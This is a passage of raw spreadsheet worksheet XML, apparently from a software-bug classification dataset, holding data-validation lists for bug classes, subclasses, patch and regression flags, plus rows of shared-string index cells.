      <c r="Q4379" s="12">
        <v>4.9000000000000004</v>
      </c>
      <c r="R4379" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4379" s="12" t="s">
        <v>28162</v>
      </c>
      <c r="T4379" s="12" t="s">
        <v>27734</v>
      </c>
      <c r="U4379" s="12" t="s">
        <v>28163</v>
      </c>
      <c r="V4379" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4379" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4379" s="12">
        <v>30</v>
      </c>
      <c r="Y4379" s="12" t="s">
        <v>28164</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:Y4379" xr:uid="{00000000-0009-0000-0000-000001000000}">
    <sortState ref="A2:Y4379">
      <sortCondition ref="A1:A4379"/>
    </sortState>
  </autoFilter>
  <phoneticPr fontId="1" type="noConversion"/>
  <dataValidations xWindow="217" yWindow="456" count="4">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" prompt="patch found: yes_x000a_patch not found: no" sqref="F4155 F4172 F4211 F4222 F4288 F4366 F4368 D2:D1509 D1511:D4379" xr:uid="{00000000-0002-0000-0100-000000000000}">
      <formula1>"YES,NO"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" prompt="bug type classes" sqref="B2:B1509 B1511:B4379" xr:uid="{00000000-0002-0000-0100-000001000000}">
      <formula1>"ARB,NAM,BOH,UNK"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" prompt="bug type subclasses" sqref="C2:C1509 C1511:C4379" xr:uid="{00000000-0002-0000-0100-000002000000}">
      <formula1>"MEM,STO,LOG,NUM,TOT,ARU,LAG,ENV,TIM,SEQ,NAU"</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" prompt="regression yes: yes_x000a_regression no: no" sqref="F4367 F4156:F4171 F4173:F4210 F4212:F4221 F4223:F4287 F4289:F4365 F4369:F1048576 F2241:F4154 F1511:F2239 F1:F1509" xr:uid="{00000000-0002-0000-0100-000003000000}">
      <formula1>"YES,NO"</formula1>
    </dataValidation>
  </dataValidations>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351"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="2" max="2" width="60.6640625" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="16.4140625" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="19.4140625" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="14.83203125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="12.58203125" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="14.33203125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="24.4140625" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="8.33203125" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="20.5" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="17.9140625" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="20.5" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="16.58203125" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="12.58203125" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="20.83203125" bestFit="1" customWidth="1"/>
    <col min="16" max="16" width="36.58203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:17" s="5" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A1" s="8" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="8" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="8" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="8" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="8" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="8" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="8" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="8" t="s">
        <v>28170</v>
      </c>
      <c r="I1" s="8" t="s">
        <v>7</v>
      </c>
      <c r="J1" s="8" t="s">
        <v>8</v>
      </c>
      <c r="K1" s="8" t="s">
        <v>9</v>
      </c>
      <c r="L1" s="8" t="s">
        <v>10</v>
      </c>
      <c r="M1" s="8" t="s">
        <v>28172</v>
      </c>
      <c r="N1" s="8" t="s">
        <v>28165</v>
      </c>
      <c r="O1" s="8" t="s">
        <v>11</v>
      </c>
      <c r="P1" s="8" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="2" spans="1:17" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A2">
        <v>18</v>
      </c>
      <c r="B2" t="s">
        <v>95</v>
      </c>
      <c r="C2" t="s">
        <v>21</v>
      </c>
      <c r="D2" t="s">
        <v>43</v>
      </c>
      <c r="E2" t="s">
        <v>96</v>
      </c>
      <c r="F2" t="s">
        <v>15</v>
      </c>
      <c r="G2" t="s">
        <v>16</v>
      </c>
      <c r="H2"/>
      <c r="I2" t="s">
        <v>17</v>
      </c>
      <c r="J2" t="s">
        <v>97</v>
      </c>
      <c r="K2" t="s">
        <v>98</v>
      </c>
      <c r="L2" t="s">
        <v>99</v>
      </c>
      <c r="M2" t="s">
        <v>100</v>
      </c>
      <c r="N2" t="s">
        <v>20</v>
      </c>
      <c r="O2">
        <v>10</v>
      </c>
      <c r="P2" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="3" spans="1:17" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A3">
        <v>214</v>
      </c>
      <c r="B3" t="s">
        <v>561</v>
      </c>
      <c r="C3" t="s">
        <v>21</v>
      </c>
      <c r="D3" t="s">
        <v>13</v>
      </c>
      <c r="E3" t="s">
        <v>14</v>
      </c>
      <c r="F3" t="s">
        <v>350</v>
      </c>
      <c r="G3" t="s">
        <v>16</v>
      </c>
      <c r="H3"/>
      <c r="I3" t="s">
        <v>17</v>
      </c>
      <c r="J3" t="s">
        <v>562</v>
      </c>
      <c r="K3" t="s">
        <v>563</v>
      </c>
      <c r="L3" t="s">
        <v>564</v>
      </c>
      <c r="M3" t="s">
        <v>117</v>
      </c>
      <c r="N3" t="s">
        <v>20</v>
      </c>
      <c r="O3">
        <v>2</v>
      </c>
      <c r="P3" t="s">
        <v>565</v>
      </c>
    </row>
    <row r="4" spans="1:17" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A4">
        <v>350</v>
      </c>
      <c r="B4" t="s">
        <v>924</v>
      </c>
      <c r="C4" t="s">
        <v>21</v>
      </c>
      <c r="D4" t="s">
        <v>925</v>
      </c>
      <c r="E4" t="s">
        <v>926</v>
      </c>
      <c r="F4" t="s">
        <v>350</v>
      </c>
      <c r="G4" t="s">
        <v>16</v>
      </c>
      <c r="H4" t="s">
        <v>927</v>
      </c>
      <c r="I4" t="s">
        <v>17</v>
      </c>
      <c r="J4" t="s">
        <v>928</v>
      </c>
      <c r="K4" t="s">
        <v>921</v>
      </c>
      <c r="L4" t="s">
        <v>929</v>
      </c>
      <c r="M4" t="s">
        <v>930</v>
      </c>
      <c r="N4" t="s">
        <v>20</v>
      </c>
      <c r="O4">
        <v>3</v>
      </c>
      <c r="P4"/>
    </row>
    <row r="5" spans="1:17" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A5">
        <v>496</v>
      </c>
      <c r="B5" t="s">
        <v>1293</v>
      </c>
      <c r="C5" t="s">
        <v>21</v>
      </c>
      <c r="D5" t="s">
        <v>13</v>
      </c>
      <c r="E5" t="s">
        <v>14</v>
      </c>
      <c r="F5" t="s">
        <v>350</v>
      </c>
      <c r="G5" t="s">
        <v>53</v>
      </c>
      <c r="H5" t="s">
        <v>1237</v>
      </c>
      <c r="I5" t="s">
        <v>17</v>
      </c>
      <c r="J5" t="s">
        <v>1294</v>
      </c>
      <c r="K5" t="s">
        <v>1295</v>
      </c>
      <c r="L5" t="s">
        <v>1296</v>
      </c>
      <c r="M5" t="s">
        <v>1068</v>
      </c>
      <c r="N5" t="s">
        <v>20</v>
      </c>
      <c r="O5">
        <v>5</v>
      </c>
      <c r="P5" t="s">
        <v>1297</v>
      </c>
    </row>
    <row r="6" spans="1:17" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A6">
        <v>596</v>
      </c>
      <c r="B6" t="s">
        <v>1512</v>
      </c>
      <c r="C6" t="s">
        <v>21</v>
      </c>
      <c r="D6" t="s">
        <v>925</v>
      </c>
      <c r="E6" t="s">
        <v>926</v>
      </c>
      <c r="F6" t="s">
        <v>350</v>
      </c>
      <c r="G6" t="s">
        <v>16</v>
      </c>
      <c r="H6" t="s">
        <v>654</v>
      </c>
      <c r="I6" t="s">
        <v>17</v>
      </c>
      <c r="J6" t="s">
        <v>1513</v>
      </c>
      <c r="K6" t="s">
        <v>1514</v>
      </c>
      <c r="L6" t="s">
        <v>1515</v>
      </c>
      <c r="M6" t="s">
        <v>930</v>
      </c>
      <c r="N6" t="s">
        <v>20</v>
      </c>
      <c r="O6">
        <v>2</v>
      </c>
      <c r="P6"/>
    </row>
    <row r="7" spans="1:17" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A7">
        <v>597</v>
      </c>
      <c r="B7" t="s">
        <v>1516</v>
      </c>
      <c r="C7" t="s">
        <v>21</v>
      </c>
      <c r="D7" t="s">
        <v>35</v>
      </c>
      <c r="E7" t="s">
        <v>378</v>
      </c>
      <c r="F7" t="s">
        <v>350</v>
      </c>
      <c r="G7" t="s">
        <v>16</v>
      </c>
      <c r="H7">
        <v>2.5</v>
      </c>
      <c r="I7" t="s">
        <v>17</v>
      </c>
      <c r="J7" t="s">
        <v>1517</v>
      </c>
      <c r="K7" t="s">
        <v>1514</v>
      </c>
      <c r="L7" t="s">
        <v>1518</v>
      </c>
      <c r="M7" t="s">
        <v>222</v>
      </c>
      <c r="N7" t="s">
        <v>20</v>
      </c>
      <c r="O7">
        <v>3</v>
      </c>
      <c r="P7"/>
    </row>
    <row r="8" spans="1:17" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A8">
        <v>628</v>
      </c>
      <c r="B8" t="s">
        <v>1598</v>
      </c>
      <c r="C8" t="s">
        <v>21</v>
      </c>
      <c r="D8" t="s">
        <v>145</v>
      </c>
      <c r="E8" t="s">
        <v>760</v>
      </c>
      <c r="F8" t="s">
        <v>350</v>
      </c>
      <c r="G8" t="s">
        <v>16</v>
      </c>
      <c r="H8" t="s">
        <v>1282</v>
      </c>
      <c r="I8" t="s">
        <v>17</v>
      </c>
      <c r="J8" t="s">
        <v>1599</v>
      </c>
      <c r="K8" t="s">
        <v>1600</v>
      </c>
      <c r="L8" t="s">
        <v>1601</v>
      </c>
      <c r="M8" t="s">
        <v>1602</v>
      </c>
      <c r="N8" t="s">
        <v>20</v>
      </c>
      <c r="O8">
        <v>7</v>
      </c>
      <c r="P8" t="s">
        <v>1603</v>
      </c>
    </row>
    <row r="9" spans="1:17" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A9">
        <v>629</v>
      </c>
      <c r="B9" t="s">
        <v>1604</v>
      </c>
      <c r="C9" t="s">
        <v>21</v>
      </c>
      <c r="D9" t="s">
        <v>145</v>
      </c>
      <c r="E9" t="s">
        <v>760</v>
      </c>
      <c r="F9" t="s">
        <v>350</v>
      </c>
      <c r="G9" t="s">
        <v>16</v>
      </c>
      <c r="H9" t="s">
        <v>1282</v>
      </c>
      <c r="I9" t="s">
        <v>17</v>
      </c>
      <c r="J9" t="s">
        <v>1605</v>
      </c>
      <c r="K9" t="s">
        <v>1600</v>
      </c>
      <c r="L9" t="s">
        <v>1606</v>
      </c>
      <c r="M9" t="s">
        <v>1602</v>
      </c>
      <c r="N9" t="s">
        <v>20</v>
      </c>
      <c r="O9">
        <v>3</v>
      </c>
      <c r="P9" t="s">
        <v>1607</v>
      </c>
    </row>
    <row r="10" spans="1:17" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A10" s="6">
        <v>639</v>
      </c>
      <c r="B10" s="6" t="s">
        <v>1634</v>
      </c>
      <c r="C10" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D10" s="6" t="s">
        <v>27</v>
      </c>
      <c r="E10" s="6" t="s">
        <v>28</v>
      </c>
      <c r="F10" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G10" s="6" t="s">
        <v>16</v>
      </c>
      <c r="H10" s="6" t="s">
        <v>1421</v>
      </c>
      <c r="I10" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J10" s="6" t="s">
        <v>1635</v>
      </c>
      <c r="K10" s="6" t="s">
        <v>1600</v>
      </c>
      <c r="L10" s="6" t="s">
        <v>1636</v>
      </c>
      <c r="M10" s="6" t="s">
        <v>215</v>
      </c>
      <c r="N10" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O10" s="6">
        <v>5</v>
      </c>
      <c r="P10" s="6" t="s">
        <v>1637</v>
      </c>
    </row>
    <row r="11" spans="1:17" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A11">
        <v>650</v>
      </c>
      <c r="B11" t="s">
        <v>1665</v>
      </c>
      <c r="C11" t="s">
        <v>21</v>
      </c>
      <c r="D11" t="s">
        <v>43</v>
      </c>
      <c r="E11" t="s">
        <v>28</v>
      </c>
      <c r="F11" t="s">
        <v>350</v>
      </c>
      <c r="G11" t="s">
        <v>16</v>
      </c>
      <c r="H11" t="s">
        <v>1539</v>
      </c>
      <c r="I11" t="s">
        <v>17</v>
      </c>
      <c r="J11" t="s">
        <v>1666</v>
      </c>
      <c r="K11" t="s">
        <v>93</v>
      </c>
      <c r="L11" t="s">
        <v>1667</v>
      </c>
      <c r="M11" t="s">
        <v>93</v>
      </c>
      <c r="N11" t="s">
        <v>20</v>
      </c>
      <c r="O11">
        <v>4</v>
      </c>
      <c r="P11" t="s">
        <v>1668</v>
      </c>
    </row>
    <row r="12" spans="1:17" s="6" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A12" s="6">
        <v>671</v>
      </c>
      <c r="B12" s="6" t="s">
        <v>1710</v>
      </c>
      <c r="C12" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D12" s="6" t="s">
        <v>22</v>
      </c>
      <c r="E12" s="6" t="s">
        <v>23</v>
      </c>
      <c r="F12" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G12" s="6" t="s">
        <v>66</v>
      </c>
      <c r="H12" s="6" t="s">
        <v>1711</v>
      </c>
      <c r="I12" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J12" s="6" t="s">
        <v>1712</v>
      </c>
      <c r="K12" s="6" t="s">
        <v>472</v>
      </c>
      <c r="L12" s="6" t="s">
        <v>1713</v>
      </c>
      <c r="M12" s="6" t="s">
        <v>19</v>
      </c>
      <c r="N12" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O12" s="6">
        <v>1</v>
      </c>
      <c r="P12" s="6" t="s">
        <v>28169</v>
      </c>
    </row>
    <row r="13" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A13">
        <v>687</v>
      </c>
      <c r="B13" t="s">
        <v>1736</v>
      </c>
      <c r="C13" t="s">
        <v>21</v>
      </c>
      <c r="D13" t="s">
        <v>22</v>
      </c>
      <c r="E13" t="s">
        <v>1724</v>
      </c>
      <c r="F13" t="s">
        <v>350</v>
      </c>
      <c r="G13" t="s">
        <v>16</v>
      </c>
      <c r="H13" t="s">
        <v>1482</v>
      </c>
      <c r="I13" t="s">
        <v>17</v>
      </c>
      <c r="J13" t="s">
        <v>1737</v>
      </c>
      <c r="K13" t="s">
        <v>921</v>
      </c>
      <c r="L13" t="s">
        <v>1738</v>
      </c>
      <c r="M13" t="s">
        <v>921</v>
      </c>
      <c r="N13" t="s">
        <v>20</v>
      </c>
      <c r="O13">
        <v>2</v>
      </c>
      <c r="P13" t="s">
        <v>1739</v>
      </c>
    </row>
    <row r="14" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A14">
        <v>735</v>
      </c>
      <c r="B14" t="s">
        <v>1812</v>
      </c>
      <c r="C14" t="s">
        <v>21</v>
      </c>
      <c r="D14" t="s">
        <v>22</v>
      </c>
      <c r="E14" t="s">
        <v>23</v>
      </c>
      <c r="F14" t="s">
        <v>350</v>
      </c>
      <c r="G14" t="s">
        <v>53</v>
      </c>
      <c r="H14" t="s">
        <v>1482</v>
      </c>
      <c r="I14" t="s">
        <v>17</v>
      </c>
      <c r="J14" t="s">
        <v>1813</v>
      </c>
      <c r="K14" t="s">
        <v>1814</v>
      </c>
      <c r="L14" t="s">
        <v>1815</v>
      </c>
      <c r="M14" t="s">
        <v>19</v>
      </c>
      <c r="N14" t="s">
        <v>20</v>
      </c>
      <c r="O14">
        <v>12</v>
      </c>
      <c r="P14" t="s">
        <v>1816</v>
      </c>
    </row>
    <row r="15" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A15">
        <v>890</v>
      </c>
      <c r="B15" t="s">
        <v>2112</v>
      </c>
      <c r="C15" t="s">
        <v>21</v>
      </c>
      <c r="D15" t="s">
        <v>27</v>
      </c>
      <c r="E15" t="s">
        <v>28</v>
      </c>
      <c r="F15" t="s">
        <v>350</v>
      </c>
      <c r="G15" t="s">
        <v>16</v>
      </c>
      <c r="H15" t="s">
        <v>1678</v>
      </c>
      <c r="I15" t="s">
        <v>17</v>
      </c>
      <c r="J15" t="s">
        <v>2113</v>
      </c>
      <c r="K15" t="s">
        <v>2114</v>
      </c>
      <c r="L15" t="s">
        <v>2115</v>
      </c>
      <c r="M15" t="s">
        <v>222</v>
      </c>
      <c r="N15" t="s">
        <v>20</v>
      </c>
      <c r="O15">
        <v>20</v>
      </c>
      <c r="Q15" t="s">
        <v>8473</v>
      </c>
    </row>
    <row r="16" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A16">
        <v>930</v>
      </c>
      <c r="B16" t="s">
        <v>2191</v>
      </c>
      <c r="C16" t="s">
        <v>21</v>
      </c>
      <c r="D16" t="s">
        <v>43</v>
      </c>
      <c r="E16" t="s">
        <v>96</v>
      </c>
      <c r="F16" t="s">
        <v>350</v>
      </c>
      <c r="G16" t="s">
        <v>53</v>
      </c>
      <c r="H16" t="s">
        <v>2157</v>
      </c>
      <c r="I16" t="s">
        <v>17</v>
      </c>
      <c r="J16" t="s">
        <v>2192</v>
      </c>
      <c r="K16" t="s">
        <v>330</v>
      </c>
      <c r="L16" t="s">
        <v>2193</v>
      </c>
      <c r="M16" t="s">
        <v>100</v>
      </c>
      <c r="N16" t="s">
        <v>20</v>
      </c>
      <c r="O16">
        <v>5</v>
      </c>
      <c r="P16" t="s">
        <v>2194</v>
      </c>
    </row>
    <row r="17" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A17">
        <v>943</v>
      </c>
      <c r="B17" t="s">
        <v>28557</v>
      </c>
      <c r="C17" t="s">
        <v>21</v>
      </c>
      <c r="D17" t="s">
        <v>13</v>
      </c>
      <c r="E17" t="s">
        <v>129</v>
      </c>
      <c r="F17" t="s">
        <v>350</v>
      </c>
      <c r="G17" t="s">
        <v>16</v>
      </c>
      <c r="H17" t="s">
        <v>1482</v>
      </c>
      <c r="I17" t="s">
        <v>17</v>
      </c>
      <c r="J17" t="s">
        <v>2216</v>
      </c>
      <c r="K17" t="s">
        <v>2217</v>
      </c>
      <c r="L17" t="s">
        <v>2218</v>
      </c>
      <c r="M17" t="s">
        <v>130</v>
      </c>
      <c r="N17" t="s">
        <v>20</v>
      </c>
      <c r="O17">
        <v>1</v>
      </c>
      <c r="P17" t="s">
        <v>28199</v>
      </c>
    </row>
    <row r="18" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A18">
        <v>994</v>
      </c>
      <c r="B18" t="s">
        <v>2330</v>
      </c>
      <c r="C18" t="s">
        <v>21</v>
      </c>
      <c r="D18" t="s">
        <v>111</v>
      </c>
      <c r="E18" t="s">
        <v>28</v>
      </c>
      <c r="F18" t="s">
        <v>350</v>
      </c>
      <c r="G18" t="s">
        <v>16</v>
      </c>
      <c r="H18" t="s">
        <v>2331</v>
      </c>
      <c r="I18" t="s">
        <v>17</v>
      </c>
      <c r="J18" t="s">
        <v>2332</v>
      </c>
      <c r="K18" t="s">
        <v>2333</v>
      </c>
      <c r="L18" t="s">
        <v>2334</v>
      </c>
      <c r="M18" t="s">
        <v>2335</v>
      </c>
      <c r="N18" t="s">
        <v>20</v>
      </c>
      <c r="O18">
        <v>0</v>
      </c>
      <c r="P18" t="s">
        <v>2336</v>
      </c>
    </row>
    <row r="19" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A19">
        <v>1213</v>
      </c>
      <c r="B19" t="s">
        <v>2698</v>
      </c>
      <c r="C19" t="s">
        <v>21</v>
      </c>
      <c r="D19" t="s">
        <v>43</v>
      </c>
      <c r="E19" t="s">
        <v>65</v>
      </c>
      <c r="F19" t="s">
        <v>350</v>
      </c>
      <c r="G19" t="s">
        <v>16</v>
      </c>
      <c r="H19" t="s">
        <v>2699</v>
      </c>
      <c r="I19" t="s">
        <v>17</v>
      </c>
      <c r="J19" t="s">
        <v>2700</v>
      </c>
      <c r="K19" t="s">
        <v>1172</v>
      </c>
      <c r="L19" t="s">
        <v>2701</v>
      </c>
      <c r="M19" t="s">
        <v>70</v>
      </c>
      <c r="N19" t="s">
        <v>20</v>
      </c>
      <c r="O19">
        <v>2</v>
      </c>
      <c r="P19" t="s">
        <v>2702</v>
      </c>
    </row>
    <row r="20" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A20">
        <v>1294</v>
      </c>
      <c r="B20" t="s">
        <v>2851</v>
      </c>
      <c r="C20" t="s">
        <v>21</v>
      </c>
      <c r="D20" t="s">
        <v>51</v>
      </c>
      <c r="E20" t="s">
        <v>2531</v>
      </c>
      <c r="F20" t="s">
        <v>350</v>
      </c>
      <c r="G20" t="s">
        <v>16</v>
      </c>
      <c r="H20" t="s">
        <v>2489</v>
      </c>
      <c r="I20" t="s">
        <v>17</v>
      </c>
      <c r="J20" t="s">
        <v>2852</v>
      </c>
      <c r="K20" t="s">
        <v>57</v>
      </c>
      <c r="L20" t="s">
        <v>2853</v>
      </c>
      <c r="M20" t="s">
        <v>57</v>
      </c>
      <c r="N20" t="s">
        <v>20</v>
      </c>
      <c r="O20">
        <v>2</v>
      </c>
      <c r="P20" t="s">
        <v>2854</v>
      </c>
    </row>
    <row r="21" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A21">
        <v>1302</v>
      </c>
      <c r="B21" t="s">
        <v>2866</v>
      </c>
      <c r="C21" t="s">
        <v>21</v>
      </c>
      <c r="D21" t="s">
        <v>43</v>
      </c>
      <c r="E21" t="s">
        <v>2451</v>
      </c>
      <c r="F21" t="s">
        <v>350</v>
      </c>
      <c r="G21" t="s">
        <v>16</v>
      </c>
      <c r="H21" t="s">
        <v>2811</v>
      </c>
      <c r="I21" t="s">
        <v>17</v>
      </c>
      <c r="J21" t="s">
        <v>2867</v>
      </c>
      <c r="K21" t="s">
        <v>2868</v>
      </c>
      <c r="L21" t="s">
        <v>2869</v>
      </c>
      <c r="M21" t="s">
        <v>93</v>
      </c>
      <c r="N21" t="s">
        <v>20</v>
      </c>
      <c r="O21">
        <v>5</v>
      </c>
      <c r="P21" t="s">
        <v>2870</v>
      </c>
    </row>
    <row r="22" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A22">
        <v>1311</v>
      </c>
      <c r="B22" t="s">
        <v>2887</v>
      </c>
      <c r="C22" t="s">
        <v>21</v>
      </c>
      <c r="D22" t="s">
        <v>51</v>
      </c>
      <c r="E22" t="s">
        <v>2488</v>
      </c>
      <c r="F22" t="s">
        <v>350</v>
      </c>
      <c r="G22" t="s">
        <v>16</v>
      </c>
      <c r="H22" t="s">
        <v>2888</v>
      </c>
      <c r="I22" t="s">
        <v>17</v>
      </c>
      <c r="J22" t="s">
        <v>2889</v>
      </c>
      <c r="K22" t="s">
        <v>57</v>
      </c>
      <c r="L22" t="s">
        <v>2890</v>
      </c>
      <c r="M22" t="s">
        <v>57</v>
      </c>
      <c r="N22" t="s">
        <v>20</v>
      </c>
      <c r="O22">
        <v>5</v>
      </c>
      <c r="P22" t="s">
        <v>2891</v>
      </c>
    </row>
    <row r="23" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A23">
        <v>1551</v>
      </c>
      <c r="B23" t="s">
        <v>3256</v>
      </c>
      <c r="C23" t="s">
        <v>21</v>
      </c>
      <c r="D23" t="s">
        <v>51</v>
      </c>
      <c r="E23" t="s">
        <v>2586</v>
      </c>
      <c r="F23" t="s">
        <v>350</v>
      </c>
      <c r="G23" t="s">
        <v>16</v>
      </c>
      <c r="H23" t="s">
        <v>3257</v>
      </c>
      <c r="I23" t="s">
        <v>17</v>
      </c>
      <c r="J23" t="s">
        <v>3258</v>
      </c>
      <c r="K23" t="s">
        <v>3160</v>
      </c>
      <c r="L23" t="s">
        <v>3259</v>
      </c>
      <c r="M23" t="s">
        <v>3260</v>
      </c>
      <c r="N23" t="s">
        <v>20</v>
      </c>
      <c r="O23">
        <v>8</v>
      </c>
      <c r="P23" t="s">
        <v>3261</v>
      </c>
    </row>
    <row r="24" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A24" s="6">
        <v>1593</v>
      </c>
      <c r="B24" s="6" t="s">
        <v>3343</v>
      </c>
      <c r="C24" s="6" t="s">
        <v>21</v>
      </c>
      <c r="D24" s="6" t="s">
        <v>51</v>
      </c>
      <c r="E24" s="6" t="s">
        <v>1203</v>
      </c>
      <c r="F24" s="6" t="s">
        <v>350</v>
      </c>
      <c r="G24" s="6" t="s">
        <v>66</v>
      </c>
      <c r="H24" s="6" t="s">
        <v>2528</v>
      </c>
      <c r="I24" s="6" t="s">
        <v>17</v>
      </c>
      <c r="J24" s="6" t="s">
        <v>3344</v>
      </c>
      <c r="K24" s="6" t="s">
        <v>2858</v>
      </c>
      <c r="L24" s="6" t="s">
        <v>3345</v>
      </c>
      <c r="M24" s="6" t="s">
        <v>2864</v>
      </c>
      <c r="N24" s="6" t="s">
        <v>20</v>
      </c>
      <c r="O24" s="6">
        <v>3</v>
      </c>
      <c r="P24" s="6" t="s">
        <v>3346</v>
      </c>
    </row>
    <row r="25" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A25">
        <v>1611</v>
      </c>
      <c r="B25" t="s">
        <v>3359</v>
      </c>
      <c r="C25" t="s">
        <v>21</v>
      </c>
      <c r="D25" t="s">
        <v>43</v>
      </c>
      <c r="E25" t="s">
        <v>103</v>
      </c>
      <c r="F25" t="s">
        <v>350</v>
      </c>
      <c r="G25" t="s">
        <v>16</v>
      </c>
      <c r="H25" t="s">
        <v>2489</v>
      </c>
      <c r="I25" t="s">
        <v>17</v>
      </c>
      <c r="J25" t="s">
        <v>3360</v>
      </c>
      <c r="K25" t="s">
        <v>3361</v>
      </c>
      <c r="L25" t="s">
        <v>3362</v>
      </c>
      <c r="M25" t="s">
        <v>3363</v>
      </c>
      <c r="N25" t="s">
        <v>20</v>
      </c>
      <c r="O25">
        <v>1</v>
      </c>
      <c r="P25" t="s">
        <v>3364</v>
      </c>
    </row>
    <row r="26" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A26">
        <v>1618</v>
      </c>
      <c r="B26" t="s">
        <v>3365</v>
      </c>
      <c r="C26" t="s">
        <v>21</v>
      </c>
      <c r="D26" t="s">
        <v>51</v>
      </c>
      <c r="E26" t="s">
        <v>1203</v>
      </c>
      <c r="F26" t="s">
        <v>350</v>
      </c>
      <c r="G26" t="s">
        <v>16</v>
      </c>
      <c r="H26" t="s">
        <v>3366</v>
      </c>
      <c r="I26" t="s">
        <v>17</v>
      </c>
      <c r="J26" t="s">
        <v>3367</v>
      </c>
      <c r="K26" t="s">
        <v>2398</v>
      </c>
      <c r="L26" t="s">
        <v>3368</v>
      </c>
      <c r="M26" t="s">
        <v>2398</v>
      </c>
      <c r="N26" t="s">
        <v>20</v>
      </c>
      <c r="O26">
        <v>5</v>
      </c>
      <c r="P26" t="s">
        <v>3369</v>
      </c>
    </row>
    <row r="27" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A27">
        <v>1622</v>
      </c>
      <c r="B27" t="s">
        <v>3370</v>
      </c>
      <c r="C27" t="s">
        <v>21</v>
      </c>
      <c r="D27" t="s">
        <v>51</v>
      </c>
      <c r="E27" t="s">
        <v>52</v>
      </c>
      <c r="F27" t="s">
        <v>350</v>
      </c>
      <c r="G27" t="s">
        <v>16</v>
      </c>
      <c r="H27" t="s">
        <v>2999</v>
      </c>
      <c r="I27" t="s">
        <v>17</v>
      </c>
      <c r="J27" t="s">
        <v>3371</v>
      </c>
      <c r="K27" t="s">
        <v>2391</v>
      </c>
      <c r="L27" t="s">
        <v>3372</v>
      </c>
      <c r="M27" t="s">
        <v>57</v>
      </c>
      <c r="N27">
        <v>1689</v>
      </c>
      <c r="O27">
        <v>13</v>
      </c>
      <c r="P27" t="s">
        <v>3373</v>
      </c>
    </row>
    <row r="28" spans="1:16" x14ac:dyDescent="0.3">
      <c r="A28">
        <v>1624</v>
      </c>
      <c r="B28" t="s">
        <v>28689</v>
      </c>
      <c r="C28" t="s">
        <v>21</v>
      </c>
      <c r="D28" t="s">
        <v>51</v>
      </c>
      <c r="E28" t="s">
        <v>1203</v>
      </c>
      <c r="F28" t="s">
        <v>350</v>
      </c>
      <c r="G28" t="s">
        <v>16</v>
      </c>
      <c r="H28" t="s">
        <v>3366</v>
      </c>
      <c r="I28" t="s">
        <v>17</v>
      </c>
      <c r="J28" t="s">
        <v>3374</v>
      </c>
      <c r="K28" t="s">
        <v>2398</v>
      </c>
      <c r="L28" t="s">
        <v>2544</v>
      </c>
      <c r="M28" t="s">
        <v>2864</v>
      </c>
